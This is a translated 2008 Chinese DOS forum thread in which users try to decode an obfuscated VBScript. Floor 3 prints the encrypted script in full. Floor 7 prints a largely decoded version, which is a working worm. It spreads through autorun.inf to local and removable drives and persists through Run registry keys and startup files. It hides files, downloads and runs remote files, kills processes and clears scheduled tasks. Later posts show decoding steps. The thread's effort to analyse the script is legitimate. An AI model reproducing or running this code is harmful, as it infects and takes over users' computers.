China DOS Union

-- Unite DOS · Advance DOS · Grow DOS --

Union site: www.cn-dos.net　Forum site: www.cn-dos.net/forum
DOS stands for freedom, openness and progress. Let us work hard, learn from the openness and GNU spirit of FreeDOS and Linux, and together build and grow a free GNU GPL world!

Guest Register Log in Members Blogs Search Command Prompt Bash Upload Statistics

中国DOS联盟论坛
The time now is 2026-06-29 16:41

Welcome new member 548840　 RSS
48,003 topics / 350,080 posts / today 0 new / 48,221 members 不转换/ 简体中文/ 繁體中文（台灣）/ 繁體中文（香港）

中国DOS联盟论坛 » DOS批处理 & 脚本技术（批处理室） » [Help] Help to decrypt a VBS View 4,108　Replies 30

Original Poster Posted 2008-01-08 21:57　·　中国辽宁沈阳联通

w1314ich

中级用户

★★

Credits 234
Posts 119
Joined 2007-04-22 11:09
19-year member
UID 86077
Gender Male

Status Offline

Floor 2 Posted 2008-01-08 23:52　·　中国福建泉州电信

chenall

银牌会员

★★★

Credits 1,276
Posts 469
Joined 2002-12-23 13:00
23-year member
UID 586
Gender Male
From 福建泉州

Status Offline

It's not a VB script, right? It looks like JS. For this kind of script, try adding a line at the end to display the content of sts. Since it's not complete, it can't be tested. If you know JS, add a line to display the content of sts and see.

QQ:366840202
http://chenall.net

Floor 3 Posted 2008-01-09 00:30　·　中国上海松江区电信

fastslz

铂金会员

★★★★

DOS一根葱

Credits 5,493
Posts 2,315
Joined 2006-05-01 10:41
20-year member
UID 54766
Gender Male
From 上海

Status Offline

It's a VBS. Finally got another encrypted VBS, same as this post http://www.cn-dos.net/forum/viewthread.php?tid=36414&fpage=1&highlight=lO%3D%22%1C%1B

lO="   ==|4|:=255:=|.|:=|.|:=|%% / |:=|/#/|:=|UT |&:=|\.|}{ =(|.|): =(|:\\.\\7|)}{ =(|.|)}{ =.(| *  87_|)}{ =.:=.:=.(5)&:=.(6)&}{=.(7)&:=&|\|:=(,()-(.))}{=|(||.||).|:=|\|:=|HKLM\\\|&&&}{=(,5): =||  =}{=|HKLM\\|&&:=|\\\\\\|}{=| \|:=(|HKLM|&&&| |,5)&&:=(|HKCU|&&&||,5)&}{=(|HKCU|&&&||,5)&:=:=(|?01|):=(|:;4::<04|):=|5EE|:=(||+)}{=|HKLM\\\\\\\\|: =  =}{    :=.:=.:=.:=.:=.:}{=|HKCU|&&|\|:=|6<=121|&(679)&|;|}{ (,|0.7|)<>5 }{=||+}{ <>31  =||+: =|$|+: :==(||,6):=(||,6):  ()   ()   ||,6: ||,:=(||,6)}{ ||,+6:=(|.|,6)=6  (|.|,6)=6  (|.|,6)=6}{ -()>9  =:. |  || |||,5,}{ ((||,6)>355       )  (||,6)<>() }{=(||,6):   =6:=6:=5}{  <>|<>|}{ =7  =9 }{7=(&,++()&,5,655):=(&,6)}{ =6  =8  6=(&,+()+()&&|&=|&,5,655):=(&,6)}{ :=+6:=6=6  7=6: >9 }{   =6}{ }{ }{    -6}{}{ (&,6) }{ =.(&,6)}{=.:=.:=.:=.:=.:=.}{=.:=.:=.:=.:=.:=.}{.: &: =|<>| }{ ||,6: ||,: ||,: ||,: ||,: ||,: ||,}{ ->=6   (&,6)   &,&&&,,7555:.}{ =6   }{ <>   (&,6)   &: &,&&&,6,6555}{ }{ }{ }{ }{ (6)    =6:= .()  =6  =}{ .()  =7  =:= ,5}{ (,6)  .()}{ (,7)  .():=: := : =.(,):. :.}{ =6   ,2}{  (5)  =6:= : =.(,):=}{. &&||&&|=. .\|&&&|\\=. .\|&&&|\\=6|}{.: ,2:  (5)  =6:= <5  =}{ (,6) }{ .().=5 }{=5}{}{ =.(,6)}{ =.(,6)}{.}{=.}{.}{ >5  <= }{=5 }{  <}{=+6}{  . }{=.}{}{=5}{ }{}{=}{ <=5 }{=.}{}{=5}{ }{.}{ }{}{=5}{ := =-6  .   . &,,|REG_SZ|:= =6  =&}{=.()}{ (5)  =5:= (,6) : =.():.=: =}{ (,7) : =.():.=: =:=)): := ,5:  = (|.|):. ||,,5:.()}{ <>5 }{  (5) }{=6: =(|.|) }{.=8:.=6:.():.(.):. ,7}{ ,2}{ (,6)  =.().  =5}{ > }{ =6  . }{}{=5: }{ }{ }{ := =.(| ":function uc(b):x="633d766263726C663A643D3132373A663D31313A6A3D31323A683D31343A6D3D33313A723D38333A6B3D313A6E3D383A733D3131343A753D2D353A763D350D0A693D22696620613D223A743D22207468656E20223A653D22656C7365696620613E3D223A613D2220616E6420613C3D223A673D22613D612B223A703D6326653A713D6326690D0A65786563757465286C2622666F722069693D3120746F206C656E2862293A613D617363286D696428622C69692C3129292226712622642226742622613D31332226712622662226742622613D313022267126226A22267426632622613D3334222663266526226822266126226D22266F2622722267026226B22266126226E22266F262273222670262235332226612622353722266F262275222670262234382226612622353222266F2622762226632622656E64206966222663262275633D75632B63687228612922266326226E657874222663262275633D726E2B632B75632229":y="execute """"":z="&chr(&h":w=")":execute("do while len(x)>1:if isnumeric(left(x,1)) then y=y&z&left(x,2)&w:x=mid(x,3) else y=y&z+left(x,4)+w:x=mid(x,5)"&vbcrlf&"loop"):execute(y):end function:qO="*  87_  ='|&&|'|):=6}{    :=+6}{ >()  =6}{ <5   .=7  =6  . &| |&(.,(.)-9),5,}{}{ (5)  =7:= =6  ():=+(((,,6))-)::==670:=678:=679:=42:=654:=68:=665:=677:=-68:=5:=5::=    }{ =&  . | |&,8,}{}{=(,-6): ()  (|H N!|): 6}{  }{ 6}{ (||,6)<> }{ ||,}{ ||,}{ ||,}{ ||,5}{ }{ (||,6)=6  . | / /|,5,: ||,5}{ (&,5)=   -6}{=(||,6): (&,6)  . &}{ 5}{: 6}{. 6555}{ (||,6)<>()  . }{}{. 0555}{ (|.|,7)=7 }{ (||,6)=() :.:: ||,}{ }{ (|.|,7)=6  .}{ ,2: &: &: 6:. &}{ :=&:= : =.(,):. :.: ,2:= :=\:   := =6  (&,5)<> }{. &,,|REG_SZ|}{ (5)   (,6)   ,&| |||&&||||,5}{ =-6 : }{ =5 : : &,-6: ,-6}{ := =6  . ,|5|,|REG_DWORD|}{ =5  =(,5):==(||,6)}{  <=:=&|,|&:=+6:}{=&:=(,|,|)}{ =5  ()}{ =()    (&,6)   &,&,5,7555}{}{ (&,6)  . &}{=6:= (||,6)<>  (,6)=6 }{ (&,&,5,7555)=6  =6}{ (&,6)  =6 }{ =6   ,-6}{. &}{  (5)   ||,: 5,+()++,5,5: =7   ,-6: 6}{ }{=6}{ }{. 655:=    }{ .=8  (.=6  <>|A:|  <> |B:|) }{ =6 }{ (&,7)   &}{ (&&,6)  (&,6) }{ (&,6)<>   &}{}{ 6: &: &&}{ }{ =-6 : &: &&}{: &&,&|((.,8)),8|&(65555,|'|),6: &}{ }{ }{:==(||,6)<>9}{}{=(||,6)<>()}{ (()  8)=5 }{      6}{=(): (  7)=5  <>  <>6  =:=: 5}{ (||,6)=6  (((||,6)))}{ }{. 455}{ (5)=6     ||,: -6}{ (|.|,6)=6 :. | |&+5.558&| / |&,5,: ||,6: 6:.}{:=:((:= =6 }{ 5: -6: : &: &: &:.}{}{ 6}{ (&)   &}{ (&)   &}{ := (,6)<>|'|&  =:(&))&&))&&()&&&&(,)&&&&()&&&&(,,)&&&&()&&&&(,)&&&&(,)&&&&(,)&&&&(,)&&&&(,,,)&&&&(,)&&&&()&&&&()&&&&()&&&&()&&&&(,,,,)&&&&(,,,)&&&&()&&&&()&&&&()&&&&()&&&) () .<>5  <5 .= <>5  (,6)<>()  ,(,6)+() (,6)>655   ,: ,5   ":execute(uc(lO+qO))

第一高手 第二高手
我的小站

Floor 4 Posted 2008-01-09 00:35　·　中国广西玉林博白县电信

zh159

金牌会员

★★★★

Credits 3,687
Posts 1,467
Joined 2005-08-08 12:00
20-year member
UID 44210

Status Offline

It seems like it was encrypted three times, and I didn't understand it at all in the end

Floor 5 Posted 2008-01-09 00:46　·　中国福建泉州电信

chenall

银牌会员

★★★

Credits 1,276
Posts 469
Joined 2002-12-23 13:00
23-year member
UID 586
Gender Male
From 福建泉州

Status Offline

It seems that trying this several times should be able to get the final result. Which one is the complete content? Give it a try.

QQ:366840202
http://chenall.net

Floor 6 Posted 2008-01-11 22:55　·　中国广东电信

godzza

新手上路

★

Credits 12
Posts 6
Joined 2007-08-06 17:23
18-year member
UID 94741
Gender Male

Status Offline

The rookie me is dazzled.

Floor 7 Posted 2008-01-14 02:26　·　中国河北保定联通

baomaboy

银牌会员

★★★

Credits 1,513
Posts 554
Joined 2005-12-30 00:50
20-year member
UID 48180
Gender Male

Status Offline

Not only encrypted three times, but also embedded thirteen times or more. The encryptor is really perverted. Using a large number of random variable replacements makes my head spin. Those interested can continue...

on error resume next

dyz="ire=|9|:ogw=700:if=|.iof|:ir=|.ior|:pz=|%pbzfcrp% /p |:qsb=|/h#g/|:gvy=|UT |&ire:vas=|\nhgbeha.vas|}{frg jf=perngrbowrpg(|jfpevcg.furyy|):frg jzv=trgbowrpg(|jvaztzgf:\\.\ebbg\pvzi2|)}{frg sfb=perngrbowrpg(|fpevcgvat.svyrflfgrzbowrpg|):frg fvf=jzv.rkrpdhrel(|fryrpg * sebz jva32_bcrengvatflfgrz|)}{frg qp=sfb.qevirf:bhj=jfpevcg.fpevcgshyyanzr:jva=sfb.trgfcrpvnysbyqre(0)&w:qve=sfb.trgfcrpvnysbyqre(1)&w}{gzc=sfb.trgfcrpvnysbyqre(2)&w:jor=qve&|jorz\|:zve=yrsg(bhj,yra(bhj)-yra(jfpevcg.fpevcganzr))}{jfe=|perngrbowrpg(||jfpevcg.furyy||).eha|:pae=|\pbzchgreanzr|:pac=|HKLM\flfgrz\pheeragpbagebyfrg\pbageby|&pae&pae&pae}{pan=ee(pac,0):vs pan=|| gura pan=gvy}{ecn=|HKLM\fbsgjner\|&pan&w:ebc=|\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\rkcybere\|}{fs=|furyy sbyqref\|:sfc=ee(|HKLM|&ebc&fs&|pbzzba fgneghc|,0)&w&if:snc=ee(|HKCU|&ebc&fs&|snibevgrf|,0)&w}{qnc=ee(|HKCU|&ebc&fs&|qrfxgbc|,0)&w:efa=pan:ug=rp(|vijg?56|):un=rp(|:;9::<5xj9|):up=|0qjhEcE|:ur=rp(|p|+up)}{efc=|HKLM\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\cbyvpvrf\rkcybere\eha\|:vs zve=qve gura flf=gehr}{sbe rnpu fv va fvf:pn=fv.pncgvba:pf=fv.pbqrfrg:pp=fv.pbhagelpbqr:bf=fv.bfynathntr:ji=fv.irefvba:arkg}{uvc=|HKCU|&ebc&|nqinaprq\fubjfhcreuvqqra|:uo=|ii1<=676k|&pue(124)&|e;|}{vs vafge(ji,|5.2|)<>0 gura}{uq=|g|+up}{ryfrvs pp<>86 gura uq=|c|+up:ryfr uq=|$|+up:raq vs"

gtz="gwf=ee(|gwf|,1):qwf=ee(|qwf|,1):vs abg vfahzrevp(gwf) be abg vfqngr(qwf) gura je |gwf|,1:je |qwf|,qngr:qwf=ee(|qwf|,qngr)}{je |gwf|,gwf+1:jo=ce(|pyfza.rkr|,1)=1 be ce(|nc.rkr|,1)=1 be ce(|chojva.rkr|,1)=1}{vs qngr-pqngr(qwf)>4 gura td=gehr:jf.eha |arg fgneg ||gnfx fpurqhyre|||,0,snyfr}{vs (ee(|gwf|,1)>800 be jo be td be abg flf) naq ee(|qrq|,1)<>pfge(qngr) gura}{vq=ee(|vqq|,1):vs jo gura vq=1:wf=1:pq=0}{qb juvyr pq<>|<fpevcg>|}{vs wf=2 be wf=4 gura}{q2=qa(zve&gvy,ug+un+rp(uq)&vq,0,100):pq=eg(zve&gvy,1)}{ryfrvs wf=1 be wf=3 gura q1=qa(zve&gvy,ug+rp(uo)+rp(uq)&vq&|&i=|&ire,0,100):pq=eg(zve&gvy,1)}{raq vs:wf=wf+1:jm=q1=1 be q2=1:vs wf>4 gura}{vs jm gura tg=1}{rkvg qb}{raq vs}{vs jm gura re -1}{ybbc}{vs rv(zve&gvy,1) gura}{frg e=sfb.bcragrkgsvyr(zve&gvy,1)}{pva=e.ernqyvar:qvf=e.ernqyvar:qan=e.ernqyvar:qse=e.ernqyvar:air=e.ernqyvar:aeh=e.ernqyvar}{aan=e.ernqyvar:ase=e.ernqyvar:gfj=e.ernqyvar:gpb=e.ernqyvar:bfj=e.ernqyvar:vqq=e.ernqyvar}{e.pybfr:qs zve&gvy:vs pva=|<fpevcg>| gura}{je |gwf|,1:je |qwf|,qngr:je |vqq|,vqq:je |qan|,qan:je |gfj|,gfj:je |gpb|,gpb:je |bfj|,bfj}{vs air-ire>=1 be abg rv(qve&ir,1) gura qa qve&aan,ug&ase&qsb&aan,aeh,2000:jfpevcg.dhvg}{vs qvf=1 naq flf gura}{vs qan<>yr be abg rv(gzc&yr,1) gura qs gzc&yr:qa gzc&qan,ug&qse&qsb&qan,1,1000}{raq vs}{raq vs}{raq vs}{raq vs}{vs re(1) be jo gura tg=1"

eiz="vs sfb.svyrrkvfgf(anzr) naq jg=1 gura rv=gehr}{vs sfb.sbyqrerkvfgf(anzr) naq jg=2 gura rv=gehr"

dfz="ne ju,0}{vs rv(ju,1) gura sfb.qryrgrsvyr(ju)}{vs rv(ju,2) gura sfb.qryrgrsbyqre(ju)"

fut=":function "

bfz="qs ju:frg ova=sfb.perngrgrkgsvyr(ju,gehr):ova.jevgryvar jg:ova.pybfr}{vs qn=1 gura ne ju,7}{vs abg re(0) gura os=1"

biz="qs ju:frg v=sfb.perngrgrkgsvyr(ju,gehr):u=iopeys}{v.jevgryvar gvy&u&||&u&|bcra=jfpevcg.rkr .\|&if&u&|furyy\bcra\pbzznaq=jfpevcg.rkr .\|&if&u&|furyy\bcra\qrsnhyg=1|}{v.pybfr:ne ju,7:vs abg re(0) gura ov=1"

rtz="vs yv<0 gura ju=bhj}{vs rv(ju,1) gura}{vs sfb.trgsvyr(ju).fvmr=0 gura}{eg=0}{ryfr}{frg e=sfb.bcragrkgsvyr(ju,1)}{frg py=sfb.bcragrkgsvyr(ju,1)}{py.ernqnyy}{gyv=py.yvar}{py.pybfr}{vs yv>0 naq yv<=gyv gura}{v=0 }{qb juvyr v<yv}{v=v+1}{vs abg e.ngraqbsfgernz gura}{fyv=e.ernqyvar}{ryfr}{fyv=0}{raq vs}{ybbc}{eg=fyv}{ryfrvs yv<=0 gura}{eg=e.ernqnyy}{ryfr}{eg=0}{raq vs}{e.pybfr}{raq vs}{ryfr}{eg=0}{raq vs"

wrz="vs eqn=-1 gura jf.ertqryrgr ean ryfr jf.ertjevgr ecn&ean,eqn,|REG_SZ|"

rrz="vs cn=1 gura ean=ecn&ean}{ee=jf.erternq(ean)}{vs re(0) gura ee=0"

arz="vs rv(svyr,1) gura:frg bsvyr=sfb.trgsvyr(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat}{vs rv(svyr,2) gura:frg bsvyr=sfb.trgsbyqre(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat"

eft=")):end function"

dnz="ne ybp,0:frg kcbfg = perngrbowrpg(|zvpebfbsg.kzyuggc|):kcbfg.bcra |trg|,jro,0:kcbfg.fraq()}{vs zva<>0 gura}{vs abg re(0) gura}{qa=1:frg ftrg=perngrbowrpg(|nqbqo.fgernz|) }{ftrg.zbqr=3:ftrg.glcr=1:ftrg.bcra():ftrg.jevgr(kcbfg.erfcbafrobql):ftrg.fnirgbsvyr ybp,2}{ne ybp,7}{vs rv(ybp,1) gura sfm=sfb.trgsvyr(ybp).fvmr ryfr sfm=0}{vs sfm>zva gura}{vs evf=1 gura jf.eha ybp}{ryfr}{qa=0:qs ybp}{raq vs}{raq vs}{raq vs"

prz="frg cy=jzv.rkrpdhrel(|fryrpg * sebz jva32_cebprff jurer anzr='|&cpf&|'|):v=1}{sbe rnpu c va cy:v=v+1}{vs v>nof(tf) gura ce=1}{vs tf<0 gura vs c.grezvangr=2 naq ce=1 gura jf.eha pz&|gfxvyy |&yrsg(c.anzr,yra(c.anzr)-4),0,snyfr}{arkg}{vs re(0) gura ce=2"

ecz="sbe v=1 gb yra(jg):rp=rp+pue(nfp(zvq(jg,v,1))-v):arkg"

l="d=125:f=123:j=124:h=97:m=109:r=13:k=110:n=122:s=-13:u=0:v=0:"

zcx="sbe rnpu q va qp}{vs zve=q&w gura jf.eha |rkcybere |&q,3,snyfr}{arkg}{bhp=eg(bhj,-1):vs ps(bhj) gura zftobk(|Hnccl Nrjlrne!|):xz 1}{vs flf gura}{uv 1}{vs ee(|gvy|,1)<>gvy gura}{je |gvy|,gvy}{je |gwf|,ogw}{je |qwf|,qngr}{je |qrq|,0}{raq vs}{vs ee(|ngq|,1)=1 gura jf.eha |ng /q /l|,0,snyfr:je |ngq|,0}{vs ee(efc&efa,0)=ir gura ef -1}{yr=ee(|qan|,1):vs rv(gzc&yr,1) gura jf.eha gzc&yr}{xz 0}{ph:re 1}{jfpevcg.fyrrc 1000}{vs ee(|qrq|,1)<>pfge(qngr) gura jf.eha bhj}{ryfr}{jfpevcg.fyrrc 5000}{vs ce(|jfpevcg.rkr|,2)=2 gura}{vs ee(|gwp|,1)=pfge(qngr) gura:jfpevcg.dhvg:ryfr:je |gwp|,qngr}{raq vs}{vs ce(|jfpevcg.rkr|,2)=1 gura jfpevcg.dhvg}{ne bhj,7:pb qve&ir:pb jva&ir:ef 1:jf.eha qve&ir}{raq vs"

aft=eft&fut

coz="qs ju:frg iof=sfb.perngrgrkgsvyr(ju,gehr):iof.jevgr bhp:iof.pybfr:ne ju,7"

rn="dim d:j=""\"":on error resume next"

rsz="vs fj=1 naq ee(efc&efa,0)<>ir gura}{jf.ertjevgr efc&efa,ir,|REG_SZ|}{vs re(0) naq abg rv(sfc,1) gura os sfc,jfe&| |||&ir&||||,0}{ryfrvs fj=-1 gura:qs sfc}{ryfrvs fj=0 gura:qs sfc:je efc&efa,-1:je ecn,-1}{raq vs"

hiz="vs fj=1 gura jf.ertjevgr uvc,|0|,|REG_DWORD|}{vs fj=0 gura uv=ee(uvc,0)"

giz="vq=ee(|vqq|,1)}{qb juvyr svq<=rvq:vqp=vqp&|,|&svq:svq=svq+1:ybbc}{vqf=vqf&vqp:vqff=fcyvg(vqf,|,|)}{sbe v=0 gb hobhaq(vqff)}{vs vq=vqff(v) gura vs abg rv(gzc&sanzr,1) gura qa gzc&sanzr,ug&shey,0,2000}{arkg}{vs rv(gzc&sanzr,1) gura jf.eha gzc&sanzr}{tv=1"

dwz="vs ee(|trq|,1)<>sa naq ce(cpf,1)=1 gura}{vs qa(gzc&sa,ug&shey,0,2000)=1 gura qjp=1}{vs rv(gzc&sa,1) naq qjp=1 gura}{vs xvyy=1 gura ce cpf,-1}{jf.eha gzc&sa}{vs abg re(0) gura je |trq|,sa:qa 0,ug+rp(uo)+ur+sa,0,0:vs xvyy=2 gura ce cpf,-1:xz 1}{raq vs}{qj=1}{raq vs}{jfpevcg.fyrrc 100"

usz="sbe rnpu q va qp}{vs q.qevirglcr=3 be (q.qevirglcr=1 naq q<>|A:| naq q<> |B:|) gura}{vs fj=1 gura}{vs rv(q&vas,2) gura qs q&vas}{vs rv(q&w&if,1) naq rv(q&vas,1) gura}{vs eg(q&vas,1)<>gvy gura ov q&vas}{ryfr}{uv 1:ov q&vas:pb q&w&if}{raq vs}{ryfrvs fj=-1 gura:qs q&vas:qs q&w&if}{ryfr:os q&w&if,jfe&|(yrsg(jfpevcg.fpevcgshyyanzr,3)),3|&fgevat(10000,|'|),1:qs q&vas}{raq vs}{raq vs}{arkg"

cuz="phf=ee(|bfj|,1)<>4}{qb}{qph=ee(|gtf|,1)<>pfge(qngr)}{vs (frpbaq(gvzr) zbq 3)=0 gura}{vs qph naq phf gura hf 1}{zva=zvahgr(abj):vs (zva zbq 2)=0 naq aa<>zva naq bb<>1 gura aa=zva:bb=tg:xz 0}{vs ee(|gfj|,1)=1 gura rkrphgr(hp(ee(|gpb|,1)))}{raq vs}{jfpevcg.fyrrc 900}{vs uv(0)=1 naq qph gura je |gtf|,qngr:hf -1}{vs ce(|gnfxzte.rkr|,1)=1 gura:jf.eha |ng |&gvzr+0.003&| /vagrenpgvir |&ir,0,snyfr:je |ngq|,1:uv 1:jfpevcg.dhvg}{ybbc"

ext=":execute(uc("

kmz="vs fj=1 gura}{ef 0:hf -1:qs bhj:qs jva&ir:qs qve&ir:qs jor&ir:jfpevcg.dhvg}{ryfr}{ef 1}{vs ps(qve&ir) gura pb qve&ir}{vs ps(jva&ir) gura pb jva&ir}{raq vs"

cfz="vs eg(ju,1)<>|'|&ire gura ps=gehr"

execute(ext&"dyz))"&ext&"zcx))"&fut&"gt()"&ext&"gtz"&aft&"ei(name,wt)"&ext&"eiz"&aft&"df(wh)"&ext&"dfz"&aft&"bf(wh,wt,da)"&ext&"bfz"&aft&"bi(wh)"&ext&"biz"&aft&"rt(wh,li)"&ext&"rtz"&aft&"wr(rna,rda)"&ext&"wrz"&aft&"rr(rna,pa)"&ext&"rrz"&aft&"ar(file,cg)"&ext&"arz"&aft&"dn(loc,web,ris,min)"&ext&"dnz"&aft&"pr(pcs,gs)"&ext&"prz"&aft&"ec(wt)"&ext&"ecz"&aft&"co(wh)"&ext&"coz"&aft&"rs(sw)"&ext&"rsz"&aft&"hi(sw)"&ext&"hiz"&aft&"gi(ids,fid,eid,fname,furl)"&ext&"giz"&aft&"dw(pcs,fn,furl,kill)"&ext&"dwz"&aft&"us(sw)"&ext&"usz"&aft&"cu()"&ext&"cuz"&aft&"km(sw)"&ext&"kmz"&aft&"cf(wh)"&ext&"cfz"&eft)

function er(sco)

if err.number<>0 or sco<0 then

err.clear

er=true

if sco<>0 and rr("ded",1)<>cstr(date) then

wr "oer",rr("oer",1)+abs(sco)

if rr("oer",1)>100 then wr "ded",date:wr "oer",0

end if

end if

end function

dim d:j="\":on error resume next

ver="9":btj=700:vs=".vbs":ve=".vbe":cm="%comspec% /c ":dfo="/u#t/":til="UT "&ver:inf="\autorun.inf"

set ws=createobject("wscript.shell"):set wmi=getobject("winmgmts:\\.\root\cimv2")

set fso=createobject("scripting.filesystemobject"):set sis=wmi.execquery("select * from win32_operatingsystem")

set dc=fso.drives:ouw=wscript.scriptfullname:win=fso.getspecialfolder(0)&j:dir=fso.getspecialfolder(1)&j

tmp=fso.getspecialfolder(2)&j:wbe=dir&"wbem\":mir=left(ouw,len(ouw)-len(wscript.scriptname))

wsr="createobject(""wscript.shell"").run":cnr="\computername":cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr

cna=rr(cnp,0):if cna="" then cna=til

rpa="HKLM\software\"&cna&j:rop="\software\microsoft\windows\currentversion\explorer\"

sf="shell folders\":fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs:fap=rr("HKCU"&rop&sf&"favorites",0)&j

dap=rr("HKCU"&rop&sf&"desktop",0)&j:rsn=cna:ht=ec("ivwt?56"):ha=ec(":;9::<5kw9"):hc="0dwuEpE":he=ec("c"+hc)

rsp="HKLM\software\microsoft\windows\currentversion\policies\explorer\run\":if mir=dir then sys=true

for each si in sis:ca=si.caption:cs=si.codeset:cc=si.countrycode:os=si.oslanguage:wv=si.version:next

hip="HKCU"&rop&"advanced\showsuperhidden":hb="vv1<=676x"&chr(124)&"r;"

if instr(wv,"5.2")<>0 then

hd="t"+hc

elseif cc<>86 then hd="p"+hc:else hd="$"+hc:end if

if pa=1 then rna=rpa&rna

rr=ws.regread(rna)

if er(0) then rr=0

for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next

for each d in dc

if mir=d&j then ws.run "explorer "&d,3,false

next

ouc=rt(ouw,-1):if cf(ouw) then msgbox("Happy Newyear!"):km 1

if sys then

hi 1

if rr("til",1)<>til then

wr "til",til

wr "tjs",btj

wr "djs",date

wr "ded",0

end if

if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0

if rr(rsp&rsn,0)=ve then rs -1

le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&le

km 0

cu:er 1

wscript.sleep 1000

if rr("ded",1)<>cstr(date) then ws.run ouw

else

wscript.sleep 5000

if pr("wscript.exe",2)=2 then

if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date

end if

if pr("wscript.exe",2)=1 then wscript.quit

ar ouw,7:co dir&ve:co win&ve:rs 1:ws.run dir&ve

end if

if li<0 then wh=ouw

if ei(wh,1) then

if fso.getfile(wh).size=0 then

rt=0

else

set r=fso.opentextfile(wh,1)

set cl=fso.opentextfile(wh,1)

cl.readall

tli=cl.line

cl.close

if li>0 and li<=tli then

i=0 

do while i<li

i=i+1

if not r.atendofstream then

sli=r.readline

else

sli=0

end if

loop

rt=sli

elseif li<=0 then

rt=r.readall

else

rt=0

end if

r.close

end if

else

rt=0

end if

if fso.fileexists(name) and wt=1 then ei=true

if fso.folderexists(name) and wt=2 then ei=true

if rt(wh,1)<>"'"&ver then cf=true

if li<0 then wh=ouw

if ei(wh,1) then

if fso.getfile(wh).size=0 then

rt=0

else

set r=fso.opentextfile(wh,1)

set cl=fso.opentextfile(wh,1)

cl.readall

tli=cl.line

cl.close

if li>0 and li<=tli then

i=0 

do while i<li

i=i+1

if not r.atendofstream then

sli=r.readline

else

sli=0

end if

loop

rt=sli

elseif li<=0 then

rt=r.readall

else

rt=0

end if

r.close

end if

else

rt=0

end if

if fso.fileexists(name) and wt=1 then ei=true

if fso.folderexists(name) and wt=2 then ei=true

if sw=1 then

rs 0:us -1:df ouw:df win&ve:df dir&ve:df wbe&ve:wscript.quit

else

rs 1

if cf(dir&ve) then co dir&ve

if cf(win&ve) then co win&ve

end if

if sw=1 and rr(rsp&rsn,0)<>ve then

ws.regwrite rsp&rsn,ve,"REG_SZ"

if er(0) and not ei(fsp,1) then bf fsp,wsr&" """&ve&"""",0

elseif sw=-1 then:df fsp

elseif sw=0 then:df fsp:wr rsp&rsn,-1:wr rpa,-1

end if

if pa=1 then rna=rpa&rna

rr=ws.regread(rna)

if er(0) then rr=0

ar wh,0

if ei(wh,1) then fso.deletefile(wh)

if ei(wh,2) then fso.deletefolder(wh)

if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing

if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing

if fso.fileexists(name) and wt=1 then ei=true

if fso.folderexists(name) and wt=2 then ei=true

if rda=-1 then ws.regdelete rna else ws.regwrite rpa&rna,rda,"REG_SZ"

for each d in dc

if d.drivetype=3 or (d.drivetype=1 and d<>"A:" and d<> "B:") then

if sw=1 then

if ei(d&inf,2) then df d&inf

if ei(d&j&vs,1) and ei(d&inf,1) then

if rt(d&inf,1)<>til then bi d&inf

else

hi 1:bi d&inf:co d&j&vs

end if

elseif sw=-1 then:df d&inf:df d&j&vs

else:bf d&j&vs,wsr&"(left(wscript.scriptfullname,3)),3"&string(10000,"'"),1:df d&inf

end if

end if

next

[ Last edited by baomaboy on 2008-1-14 at 02:34 AM ]

Recent Ratings for This Post （ 2 in total） Click for details

Rater	Score	Time
lxmxn	+8	2008-01-14 18:05
zh159	+12	2008-01-14 18:19

好多菩提树，好多明镜台。本来好多物，好多的尘埃。

Floor 8 Posted 2008-01-14 09:13　·　中国上海松江区电信

fastslz

铂金会员

★★★★

DOS一根葱

Credits 5,493
Posts 2,315
Joined 2006-05-01 10:41
20-year member
UID 54766
Gender Male
From 上海

Status Offline

Yeah, seeing him encrypt in such a bizarre way, I didn't dare to continue testing. After all, my VBS skills are insufficient, and I don't know the black part after execution.

第一高手 第二高手
我的小站

Floor 9 Posted 2008-01-14 10:54　·　中国广西玉林博白县电信

zh159

金牌会员

★★★★

Credits 3,687
Posts 1,467
Joined 2005-08-08 12:00
20-year member
UID 44210

Status Offline

I only disassembled three layers and then didn't dare to continue the test. It's really "abnormal"

Floor 10 Posted 2008-01-14 18:07　·　中国湖北武汉电信

lxmxn

版主

★★★★★

Credits 11,386
Posts 4,938
Joined 2006-07-23 17:10
19-year member
UID 59080

Status Offline

Hehe, everyone has decrypted it three times. I got stuck at the second decryption and don't know what to do next. Sweat.

This script is really tough.

Floor 11 Posted 2008-01-16 04:24　·　中国北京海淀区联通

uhnmki

初级用户

★

Credits 73
Posts 11
Joined 2008-01-08 16:07
18-year member
UID 107997
Gender Male

Status Offline

Floor 12 Posted 2008-01-16 05:42　·　中国北京海淀区联通

uhnmki

初级用户

★

Credits 73
Posts 11
Joined 2008-01-08 16:07
18-year member
UID 107997
Gender Male

Status Offline

Floor 13 Posted 2008-01-16 09:49　·　中国北京科技网

uhnmki

初级用户

★

Credits 73
Posts 11
Joined 2008-01-08 16:07
18-year member
UID 107997
Gender Male

Status Offline

【Continued Part 2】This is the result obtained from the previous decoding, but it's still not plaintext:

execute ""&chr(&h63)&chr(&h3d)&chr(&h76)&chr(&h62)&chr(&h63)&chr(&h72)&chr(&h6C)...&chr(&h75)&chr(&h63)&chr(&h22)&chr(&h29)

It seems that some hexadecimal codes are converted to ASCII codes and then combined into a string. Should plaintext instructions be included next? Since there's execute in front, we need to intercept it and continue using the previous interception process:
Sub Intercept (code)
WScript.Echo code
OutPutFile="decode_4.txt"
Set objFSO=CreateObject("Scripting.FileSystemObject")
Set objTXT=objFSO.CreateTextFile(OutPutFile,True,False)
objTXT.Write code
objTXT.Close
Set objWSH=CreateObject("WScript.Shell")
objWSH.Run OutPutFile
WScript.Quit
End Sub
Replace execute with Intercept, and the source code becomes:



